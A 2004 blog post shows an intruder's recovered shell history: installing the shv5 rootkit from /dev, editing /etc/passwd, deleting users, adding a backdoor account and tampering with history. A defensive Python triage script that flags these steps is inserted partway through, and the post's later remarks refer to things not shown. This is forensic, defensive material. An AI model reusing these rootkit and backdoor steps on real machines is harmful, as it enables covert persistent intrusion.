Monday, November 29, 2004


Cracker footsteps

Kevin dug up the history file for the cracker. Unix people will recognize this as an exact copy of what the guy did when he first logged in. It's like watching a videotape of somebody breaking into your house.

cd /dev
tar -zxvf shv5.tar.gz
cd shv5
./setup 123qwe 404
history -r~
history -r
vi /etc/passwd
vi /etc/passwd
/usr/sbin/userdel fire
/usr/sbin/userdel lordx
ps xw
uname -a
/usr/sbin/adduser crond -d /dev/crond
passwd crond
uname -a
wget perl 29 2000
perl 29 2000
which lsof
/usr/sbin/lsof | grep r0nin
/usr/sbin/lsof | grep r0nin | less
cd /home/httpd
cd vhosts/
ls -la
which talkd
which tall
which talk
man talk
ls -lrt
less messages
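A history dump like the one above is easiest to read with a little help. The following is an added example, not code from the original post: it walks a recovered history file line by line, tracks the working directory that each `cd` implies, and flags the kinds of actions the dump shows (moving into /dev, unpacking an archive or running a program there, creating an account whose home lives under /dev, deleting accounts, hand-editing /etc/passwd, and manipulating the shell history). A second helper checks /etc/passwd lines for accounts with a home under /dev or a second uid 0. The sample history and passwd lines are constructed for the example and mirror the post's dump; the assumption that the history belongs to root (so a bare `cd` lands in /root) is labelled in the code.

```python
"""Triage of a recovered shell history (added example, not the post's code)."""
import posixpath
import shlex
from dataclasses import dataclass


@dataclass
class Finding:
    line_no: int     # 1-based line in the history file
    command: str     # the command as it appeared
    indicator: str   # why it was flagged


def _under_dev(path: str) -> bool:
    """True for /dev itself or anything below it."""
    path = posixpath.normpath(path)
    return path == "/dev" or path.startswith("/dev/")


def _next_cwd(cwd: str, argv: list) -> str:
    """Resolve where a `cd` lands. Assumption: the history is root's, so a
    bare `cd` or `cd ~` goes to /root."""
    if len(argv) < 2 or argv[1].startswith("~"):
        return "/root"
    return posixpath.normpath(posixpath.join(cwd, argv[1]))


def _check(argv: list, cwd: str):
    """Return an indicator for one non-cd command, or None if it looks benign."""
    prog = posixpath.basename(argv[0])
    if prog == "tar" and _under_dev(cwd) and (
        "--extract" in argv or (len(argv) > 1 and "x" in argv[1].lstrip("-"))
    ):
        return "archive extracted inside /dev"
    if argv[0].startswith("./") and _under_dev(cwd):
        return "program run from inside /dev"
    if prog in ("adduser", "useradd"):
        for i, arg in enumerate(argv):
            if arg in ("-d", "--home", "--home-dir") and i + 1 < len(argv) \
                    and _under_dev(argv[i + 1]):
                return "new account created with a home directory under /dev"
    if prog == "userdel":
        return "existing account deleted"
    if prog in ("vi", "vim", "nano", "ed") and \
            any(a in ("/etc/passwd", "/etc/shadow") for a in argv[1:]):
        return "account database edited by hand"
    if prog == "history" and len(argv) > 1 and argv[1].startswith(("-r", "-c", "-w")):
        return "shell history manipulated"
    return None


def triage_history(lines, start_cwd: str = "/root"):
    """Flag suspicious commands, carrying the working directory across `cd`s."""
    findings, cwd = [], start_cwd
    for n, raw in enumerate(lines, 1):
        line = raw.strip()
        if not line:
            continue
        try:
            argv = shlex.split(line)
        except ValueError:          # unbalanced quotes: fall back to a plain split
            argv = line.split()
        if not argv:
            continue
        if argv[0] == "cd":
            cwd = _next_cwd(cwd, argv)
            if _under_dev(cwd):
                findings.append(Finding(n, line, "working directory moved under /dev"))
            continue
        indicator = _check(argv, cwd)
        if indicator:
            findings.append(Finding(n, line, indicator))
    return findings


def suspicious_passwd_entries(lines):
    """Flag passwd entries whose home is under /dev or that are an extra uid 0."""
    out = []
    for raw in lines:
        parts = raw.strip().split(":")
        if len(parts) < 7:
            continue
        name, _, uid, _, _, home, _ = parts[:7]
        if _under_dev(home):
            out.append((name, "home directory under /dev"))
        if uid == "0" and name != "root":
            out.append((name, "additional uid 0 account"))
    return out


# Constructed sample input, modelled on the history dump in the post.
SAMPLE_HISTORY = """\
cd /dev
tar -zxvf shv5.tar.gz
cd shv5
./setup
history -r
vi /etc/passwd
/usr/sbin/userdel fire
/usr/sbin/adduser crond -d /dev/crond
passwd crond
cd /home/httpd
ls -la
""".splitlines()

# Constructed /etc/passwd lines showing the account the dump creates.
SAMPLE_PASSWD = [
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:2:2:daemon:/sbin:/sbin/nologin",
    "crond:x:1003:1003::/dev/crond:/bin/bash",
]

if __name__ == "__main__":
    for f in triage_history(SAMPLE_HISTORY):
        print(f"{f.line_no:3d}  {f.command:<45} {f.indicator}")
    for name, why in suspicious_passwd_entries(SAMPLE_PASSWD):
        print(f"passwd: {name}: {why}")
```

The cwd tracking is what makes the `tar` and `./setup` lines interesting: neither command is suspicious on its own, only where it was run. Feed `triage_history` the lines of a real `.bash_history` (opened with `errors="replace"`, since recovered files are often partly garbage) and the passwd helper the lines of `/etc/passwd`; the rules are deliberately conservative and are a starting point for review, not a verdict.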

Notice that file -- it must have been there before the login, so the cracker must have deposited it somehow. By the time we got to it, it was full of the same garbage that all the other files had in them.

That's pretty nasty, using a security organization's own distribution of a denial of service tool (carefully labeled "for testing only") to commit a DoS attack.

Hmm -- I'm trying to think about whether software like that could be distributed with a license mechanism in place that would require users to leave a trail. Of course if there were a source distribution it would mean someone could remove the license code. That would slow down the cookbook kids, but only until a grownup released an unauthorized distribution with the crippleware disabled. Which I'm sure is why the good guys haven't bothered to do it. That, plus the fact that some good guys wouldn't want to advertise their security testing, either. Oh, well.

It might be constructive to go after those individual sources, but then again that's a whole nother obsession.

Pretty interesting to see the guy's footsteps, anyway.